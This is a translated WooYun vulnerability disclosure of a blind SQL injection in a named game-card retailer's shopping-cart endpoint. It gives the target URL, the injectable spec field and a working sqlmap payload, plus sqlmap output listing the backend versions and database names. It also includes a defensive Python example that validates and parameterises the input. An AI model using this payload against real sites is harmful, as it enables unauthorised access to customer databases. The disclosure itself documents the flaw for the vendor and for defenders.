
Vulnerability summary

Defect ID: wooyun-2015-0152249

Title: Blind SQL injection on the main site of the 老友点卡 (Laoyou game-card) website

Vendor: 广州老友网络科技有限公司 (Guangzhou Laoyou Network Technology Co., Ltd.)

Author: mango

Submitted: 2015-11-06 10:42

Fix time: 2015-12-21 10:44

Published: 2015-12-21 10:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-11-06: Actively contacting the vendor and waiting for the vendor to claim the report; details not publicly disclosed
2015-12-21: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

~~~~~

Detailed description:

http://www.laoyouka.com:80/flow.php?step=add_to_cart 
goods={goods_id:359,number:2,parent:0,quick:1,spec:[*],yijian:1}


The parameter is submitted via POST; the injection point is the value inside spec:[*].
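As an added illustration (not the vendor's code, which is not on this page) of how the add_to_cart handler should treat the goods JSON: every field, including each entry of the spec array, is required to be an integer id, and the ids are bound as query parameters rather than concatenated into the SQL. The table layout and the in-memory SQLite stand-in for the MySQL backend are assumptions made for the demo; the malicious body reuses the sqlmap payload shape shown in the proof below.

```python
import json
import sqlite3

# Constructed request bodies: the report's payload shape (a SELECT smuggled
# into the "spec" array) and a benign cart request.
MALICIOUS_GOODS = ('{"goods_id":359,"number":2,"parent":0,"quick":1,"spec":["(SELECT '
                   '(CASE WHEN (1874=1874) THEN 1874 ELSE 1874*(SELECT 1874 FROM '
                   'INFORMATION_SCHEMA.CHARACTER_SETS) END))"],"yijian":1}')
BENIGN_GOODS = '{"goods_id":359,"number":2,"parent":0,"quick":1,"spec":[12,"15"],"yijian":1}'
INT_FIELDS = ("goods_id", "number", "parent", "quick", "yijian")


def _as_int(value):
    """Accept an int or a digit-only string as an id; reject everything else."""
    if isinstance(value, int) and not isinstance(value, bool):
        return value
    if isinstance(value, str) and value.isdigit():
        return int(value)
    raise ValueError("expected integer id, got %r" % (value,))


def parse_goods(raw):
    """Validate the goods JSON of the add_to_cart POST; raises ValueError."""
    data = json.loads(raw)
    if not isinstance(data, dict) or not isinstance(data.get("spec", []), list):
        raise ValueError("goods must be an object with a list-valued spec")
    clean = {k: _as_int(data.get(k)) for k in INT_FIELDS}
    clean["spec"] = [_as_int(s) for s in data.get("spec", [])]
    return clean


def lookup_spec_attrs(conn, goods):
    """Bind the spec ids as query parameters; concatenating spec into the
    SQL string is what lets a SELECT inside it be evaluated by the DBMS."""
    if not goods["spec"]:
        return []
    marks = ",".join("?" * len(goods["spec"]))
    sql = ("SELECT goods_attr_id, attr_value FROM goods_attr "
           "WHERE goods_id = ? AND goods_attr_id IN (%s)" % marks)
    return conn.execute(sql, [goods["goods_id"], *goods["spec"]]).fetchall()


def demo_db():
    """Constructed in-memory SQLite stand-in for the shop's attribute table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE goods_attr (goods_attr_id INTEGER, goods_id INTEGER, attr_value TEXT)")
    conn.executemany("INSERT INTO goods_attr VALUES (?,?,?)",
                     [(12, 359, "100 yuan"), (15, 359, "500 yuan"), (20, 360, "50 yuan")])
    return conn
```

With this validation the sqlmap payload is rejected before any query is built, and a benign request only ever reaches the database through bound parameters.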


Proof of vulnerability:

sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: goods={"goods_id":359,"number":2,"parent":0,"quick":1,"spec":["(SELECT (CASE WHEN (1874=1874) THEN 1874 ELSE 1874*(SELECT 1874 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"],"yijian":1}
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] laoyouka_lao
Database: laoyouka_lao
[95 tables]

Fix recommendation:

Copyright notice: when reposting, please credit the source: mango@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused to respond